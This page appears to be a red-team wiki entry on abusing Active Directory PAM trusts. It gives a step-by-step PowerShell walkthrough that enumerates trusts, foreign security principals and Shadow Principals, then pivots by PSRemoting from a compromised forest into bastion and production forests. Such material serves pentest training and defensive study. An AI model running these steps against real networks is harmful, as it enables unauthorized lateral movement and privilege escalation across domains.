🟢AbusingPAM Trust
Cross Domain Attacks leverage trust relationships between different domains or forests to escalate privileges or gain unauthorized access. Specifically, abusing Privileged Access Management (PAM) Trust involves exploiting the trust established for managing privileged accounts and access within or across Active Directory environments.
Privileged Access Management trusts are designed to isolate the management of privileged accounts to enhance security.
However, attackers with administrative access in one domain (e.g., ad-attacks.local
) can exploit these trusts to gain access to resources in a trusted domain or forest (e.g., bastion.local
).
Attackers enumerate trusts to identify paths for privilege escalation or lateral movement:
Get-ADTrust -Filter *
Then, by targeting foreignSecurityPrincipal
objects, attackers can discover and exploit cross-forest permissions:
Get-ADObject -Filter {objectClass -eq "foreignSecurityPrincipal"} -Server bastion.local
These techniques reveal potential attack paths, allowing attackers to pivot across trusts, compromising additional domains or forests under certain conditions.
PowerShell
1. Enumerating trusts and hunting for access
We have DA access to the techcorp.local forest. By enumerating trusts and hunting for access, we can enumerate that we have Administrative access to the bastion.local forest.
# PowerView
# From techcorp-dc
Get-ADTrust -Filter *
Get-ADObject -Filter {objectClass -eq "foreignSecurityPrincipal"} -Server bastion.local
2. Enumerate if there is a PAM trust
# PowerView
$bastiondc = New-PSSession bastion-dc.bastion.local
Invoke-Command -ScriptBlock {Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined - eq $False)}} -Session $bastiondc
3. Check which users are members of the Shadow Principals
Invoke-Command -ScriptBlock {Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl} -Session $bastiondc
4. Establish a direct PSRemoting session on bastion-dc and access production.local
Enter-PSSession 192.168.102.1 -Authentication NegotiateWithImplicitCredential
Last updated
Was this helpful?